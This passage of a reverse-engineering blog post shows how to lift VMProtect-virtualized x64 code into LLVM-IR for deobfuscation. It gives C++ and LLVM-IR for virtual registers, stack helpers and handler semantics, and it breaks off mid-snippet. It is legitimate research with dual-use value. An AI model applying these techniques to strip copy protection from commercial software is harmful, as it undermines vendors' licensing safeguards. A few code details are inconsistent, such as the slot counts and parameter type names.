RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdaysecret club

Tickling VMProtect with LLVM: Part 1

8 September 2021 at 23:00

This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:

Foreword

First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.

  • In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I, hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
  • In 2018, a person nicknamed RYDB3RG, posted on Tuts4You a first insight on how LLVM optimizations could be beneficial when optimising VMProtected code. Although the easy example that was provided left me with a lot of questions on whether that approach would have been hassle-free or not.
  • In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.

The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.

Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.

With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.

I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.

Lifting

The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.

Lifting pipeline

Enough words or code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to make LLVM’s job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.

Liveness and aliasing information

Let’s start by saying that many deobfuscation tools are completely disregarding, or at best unsoundly handling, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM on the contrary is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally LLVM also has strong optimization passes benefiting from precise liveness information, that we absolutely want to take advantage of to clean any unnecessary stores to memory that are irrelevant after the execution of the virtualized code.

This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.

A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.

At a high level we can summarize the data-related virtual machine components as follows:

  • 30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.

  • 19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.

  • 16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won’t affect the others. Contrarily to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is also treated as the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.

  • 4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct with each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.

Helper functions

With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.

When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.

Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):

struct VirtualRegister final {
  union {
    alignas(1) struct {
      uint8_t b0;
      uint8_t b1;
      uint8_t b2;
      uint8_t b3;
      uint8_t b4;
      uint8_t b5;
      uint8_t b6;
      uint8_t b7;
    } byte;
    alignas(2) struct {
      uint16_t w0;
      uint16_t w1;
      uint16_t w2;
      uint16_t w3;
    } word;
    alignas(4) struct {
      uint32_t d0;
      uint32_t d1;
    } dword;
    alignas(8) uint64_t qword;
  } __attribute__((packed));
} __attribute__((packed));

using rref = size_t &__restrict__;

extern "C" uint8_t RAM[0];
extern "C" uint8_t GS[0];
extern "C" uint8_t FS[0];

extern "C"
size_t HelperStub(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR,
  rref vsp, rref vip,
  VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots);

extern "C"
size_t HelperFunction(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[19] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The VirtualRegister structure is meant to represent a VmRegister, divided in smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don’t necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64 bits bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.

The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions, that, once compiled to LLVM-IR, will generate a pointer parameter with a noalias attribute. The noalias attribute is hinting to the compiler that any memory access happening inside the function that is not dereferencing a pointer derived from the pointer parameter, is guaranteed not to alias with a memory access dereferencing a pointer derived from the pointer parameter.

The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.

The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.

The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.

The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.

The compiled and optimized LLVM-IR code for the described C++ definitions follows:

%struct.VirtualRegister = type { %union.anon }
%union.anon = type { i64 }
%struct.anon = type { i8, i8, i8, i8, i8, i8, i8, i8 }

@RAM = external local_unnamed_addr global [0 x i8], align 1
@GS = external local_unnamed_addr global [0 x i8], align 1
@FS = external local_unnamed_addr global [0 x i8], align 1

declare i64 @HelperStub(i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64, i64, i64, i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), %struct.VirtualRegister*, i64*) local_unnamed_addr

define i64 @HelperFunction(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %vmregs = alloca [30 x %struct.VirtualRegister], align 16
  %slots = alloca [30 x i64], align 16
  %vip = alloca i64, align 8
  %0 = bitcast [30 x %struct.VirtualRegister]* %vmregs to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %0, i8 0, i64 240, i1 false)
  %1 = bitcast [30 x i64]* %slots to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %1, i8 0, i64 240, i1 false)
  %2 = bitcast i64* %vip to i8*
  store i64 0, i64* %vip, align 8
  %arraydecay = getelementptr inbounds [30 x %struct.VirtualRegister], [30 x %struct.VirtualRegister]* %vmregs, i64 0, i64 0
  %arraydecay1 = getelementptr inbounds [30 x i64], [30 x i64]* %slots, i64 0, i64 0
  %call = call i64 @HelperStub(i64* nonnull align 8 dereferenceable(8) %rax, i64* nonnull align 8 dereferenceable(8) %rbx, i64* nonnull align 8 dereferenceable(8) %rcx, i64* nonnull align 8 dereferenceable(8) %rdx, i64* nonnull align 8 dereferenceable(8) %rsi, i64* nonnull align 8 dereferenceable(8) %rdi, i64* nonnull align 8 dereferenceable(8) %rbp, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %r8, i64* nonnull align 8 dereferenceable(8) %r9, i64* nonnull align 8 dereferenceable(8) %r10, i64* nonnull align 8 dereferenceable(8) %r11, i64* nonnull align 8 dereferenceable(8) %r12, i64* nonnull align 8 dereferenceable(8) %r13, i64* nonnull align 8 dereferenceable(8) %r14, i64* nonnull align 8 dereferenceable(8) %r15, i64* nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 0, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* nonnull %arraydecay, i64* nonnull %arraydecay1)
  ret i64 %call
}

Semantics of the handlers

We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.

The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.

STACK_PUSH

To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.

template <typename T> __attribute__((always_inline)) void STACK_PUSH(size_t &vsp, T value) {
  // Update the stack pointer
  vsp -= sizeof(T);
  // Store the value
  std::memcpy(&RAM[vsp], &value, sizeof(T));
}

We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.

STACK_POP

As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.

template <typename T> __attribute__((always_inline)) T STACK_POP(size_t &vsp) {
  // Fetch the value
  T value = 0;
  std::memcpy(&value, &RAM[vsp], sizeof(T));
  // Undefine the stack slot
  T undef = UNDEF<T>();
  std::memcpy(&RAM[vsp], &undef, sizeof(T));
  // Update the stack pointer
  vsp += sizeof(T);
  // Return the value
  return value;
}

We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.

ADD

Being a stack machine, we know that it is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back to the stack. There are four variations of the addition handler, meant to handle 8/16/32/64 bits operands, with the peculiarity that the 8 bits case is really popping 16 bits per operand off the stack and pushing a 16 bits result back to the stack to be consistent with the x64 push/pop alignment rules.

From what we just described the only thing we need is the virtual stack pointer, to be able to access the stack.

// ADD semantic

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool AF(T lhs, T rhs, T res) {
  return AuxCarryFlag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool PF(T res) {
  return ParityFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool ZF(T res) {
  return ZeroFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool SF(T res) {
  return SignFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool CF_ADD(T lhs, T rhs, T res) {
  return Carry<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool OF_ADD(T lhs, T rhs, T res) {
  return Overflow<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
void ADD_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags
  bool cf = CF_ADD(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = OF_ADD(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);
}

template <typename T>
__attribute__((always_inline))
void ADD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Initialize the operands
  T op1 = 0;
  T op2 = 0;
  // Fetch the operands
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  }
  // Calculate the add
  T res = UAdd(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  ADD_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  }
  // 7. Save the flags
  STACK_PUSH<size_t>(vsp, flags);
}

DEFINE_SEMANTIC_64(ADD_64) = ADD<uint64_t>;
DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
DEFINE_SEMANTIC(ADD_16) = ADD<uint16_t>;
DEFINE_SEMANTIC(ADD_8) = ADD<uint8_t>;

We can see that the function definition is templated with a T parameter that is internally used to generate the properly-sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally we are taking care of truncating and zero extending the special 8 bits case. Finally, after the unsigned addition took place, we rely on Remill’s semantically proven flag computations to calculate the fresh flags before pushing them to the stack.

The other binary and arithmetic operations are implemented following the same structure, with the correct operands access and flag computations.

PUSH_VMREG

This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and the value of the VmRegister. The template is additionally defining the size of the pushed value and the offset from the VmRegister slot base.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void PUSH_VMREG(size_t &vsp, VirtualRegister vmreg) {
  // Update the stack pointer
  vsp -= ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
  // Select the proper element of the virtual register
  if constexpr (Size == 64) {
    std::memcpy(&RAM[vsp], &vmreg.qword, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d0, sizeof(uint32_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d1, sizeof(uint32_t));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.word.w0, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.word.w1, sizeof(uint16_t));
    } else if constexpr (Offset == 2) {
      std::memcpy(&RAM[vsp], &vmreg.word.w2, sizeof(uint16_t));
    } else if constexpr (Offset == 3) {
      std::memcpy(&RAM[vsp], &vmreg.word.w3, sizeof(uint16_t));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = ZExt(vmreg.byte.b0);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      uint16_t byte = ZExt(vmreg.byte.b1);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
}

DEFINE_SEMANTIC(PUSH_VMREG_8_LOW) = PUSH_VMREG<8, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_8_HIGH) = PUSH_VMREG<8, 1>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWLOW) = PUSH_VMREG<16, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWHIGH) = PUSH_VMREG<16, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHLOW) = PUSH_VMREG<16, 2>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHHIGH) = PUSH_VMREG<16, 3>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_LOW) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_32(POP_VMREG_32) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_HIGH) = PUSH_VMREG<32, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_64) = PUSH_VMREG<64, 0>;

We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.

POP_VMREG

This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and a reference to the VmRegister to be updated. As before the template is defining the size of the popped value and the offset into the VmRegister slot.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void POP_VMREG(size_t &vsp, VirtualRegister &vmreg) {
  // Fetch and store the value on the virtual register
  if constexpr (Size == 64) {
    uint64_t value = 0;
    std::memcpy(&value, &RAM[vsp], sizeof(uint64_t));
    vmreg.qword = value;
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF00000000) | value);
    } else if constexpr (Offset == 1) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0x00000000FFFFFFFF) | UShl(ZExt(value), 32));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFFFFFF0000) | value);
    } else if constexpr (Offset == 1) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF0000FFFF) | UShl(ZExtTo<uint64_t>(value), 16));
    } else if constexpr (Offset == 2) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFF0000FFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 32));
    } else if constexpr (Offset == 3) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0x0000FFFFFFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 48));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b0 = Trunc(byte);
    } else if constexpr (Offset == 1) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b1 = Trunc(byte);
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
  // Clear the value on the stack
  if constexpr (Size == 64) {
    uint64_t undef = UNDEF<uint64_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    uint32_t undef = UNDEF<uint32_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint32_t));
  } else if constexpr (Size == 16) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  } else if constexpr (Size == 8) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  }
  // Update the stack pointer
  vsp += ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
}

DEFINE_SEMANTIC(POP_VMREG_8_LOW) = POP_VMREG<8, 0>;
DEFINE_SEMANTIC(POP_VMREG_8_HIGH) = POP_VMREG<8, 1>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWLOW) = POP_VMREG<16, 0>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWHIGH) = POP_VMREG<16, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHLOW) = POP_VMREG<16, 2>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHHIGH) = POP_VMREG<16, 3>;
DEFINE_SEMANTIC_64(POP_VMREG_32_LOW) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(POP_VMREG_32_HIGH) = POP_VMREG<32, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_64) = POP_VMREG<64, 0>;

In this case we can see that the update operation on the sub-chunks of the VmRegister is being done with some masking, shifting and zero extensions. This is to help LLVM with merging smaller integer values into a bigger integer value, whenever possible. As we saw in the STACK_POP operation, we are writing an undefined value to the current stack slot. Finally we are incrementing the virtual stack pointer.

LOAD and LOAD_GS

Generically speaking the LOAD handler is meant to pop an address from the stack, dereference it to load a value from one of the program segments and push the retrieved value to the top of the stack.

The following C++ snippet shows the implementation of a memory load from a generic memory pointer (e.g. SS or DS segments) and from the GS segment:

template <typename T> __attribute__((always_inline)) void LOAD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &RAM[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_SS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_SS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_SS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_SS_8) = LOAD<uint8_t>;

DEFINE_SEMANTIC_64(LOAD_DS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_DS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_DS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_DS_8) = LOAD<uint8_t>;

template <typename T> __attribute__((always_inline)) void LOAD_GS(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &GS[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_GS_64) = LOAD_GS<uint64_t>;
DEFINE_SEMANTIC(LOAD_GS_32) = LOAD_GS<uint32_t>;
DEFINE_SEMANTIC(LOAD_GS_16) = LOAD_GS<uint16_t>;
DEFINE_SEMANTIC(LOAD_GS_8) = LOAD_GS<uint8_t>;

By now the process should be clear. The only difference is the accessed zero-length array that will end up as base of the getelementptr instruction, which will directly reflect on the aliasing information that LLVM will be able to infer. The same kind of logic is applied to all the read or write memory accesses to the different segments.

DEFINE_SEMANTIC

In the code snippets of this section you may have noticed three macros named DEFINE_SEMANTIC_64, DEFINE_SEMANTIC_32 and DEFINE_SEMANTIC. They are the umpteenth trick borrowed from Remill and are meant to generate global variables with unmangled names, pointing to the function definition of the specialized template handlers. As an example, the ADD semantic definition for the 8/16/32/64 bits cases looks like this at the LLVM-IR level:

@SEM_ADD_64 = dso_local constant void (i64*)* @_Z3ADDIyEvRm, align 8
@SEM_ADD_32 = dso_local constant void (i64*)* @_Z3ADDIjEvRm, align 8
@SEM_ADD_16 = dso_local constant void (i64*)* @_Z3ADDItEvRm, align 8
@SEM_ADD_8 = dso_local constant void (i64*)* @_Z3ADDIhEvRm, align 8

UNDEF

In the code snippets of this section you may also have noticed the usage of a function called UNDEF. This function is used to store a fictitious __undef value after each pop from the stack. This is done to signal to LLVM that the popped value is no longer needed after being popped from the stack.

The __undef value is modeled as a global variable, which during the first phase of the optimization pipeline will be used by passes like DSE to kill overlapping post-dominated dead stores and it’ll be replaced with a real undef value near the end of the optimization pipeline such that the related store instruction will be gone on the final optimized LLVM-IR function.

Lifting a basic block

We now have a bunch of templates, structures and helper functions, but how do we actually end up lifting some virtualized code?

The high level idea is the following:

  • A new LLVM-IR function with the HelperStub signature is generated;
  • The function’s body is populated with call instructions to the VmHandler helper functions fed with the proper arguments (obtained from the HelperStub parameters);
  • The optimization pipeline is executed on the function, resulting in the inlining of all the helper functions (that are marked always_inline) and in the propagation of the values;
  • The updated state of the VmRegisters, VmPassingSlots and stores to the segments is optimized, removing most of the obfuscation patterns used by VMProtect;
  • The updated state of the virtual stack pointer and virtual instruction pointer is computed.

A fictitious example of a full pipeline based on the HelperStub function, implemented at the C++ level and optimized to obtain propagated LLVM-IR code follows:

extern "C" __attribute__((always_inline)) size_t SimpleExample_HelperStub(
  rptr rax, rptr rbx, rptr rcx,
  rptr rdx, rptr rsi, rptr rdi,
  rptr rbp, rptr rsp, rptr r8,
  rptr r9, rptr r10, rptr r11,
  rptr r12, rptr r13, rptr r14,
  rptr r15, rptr flags,
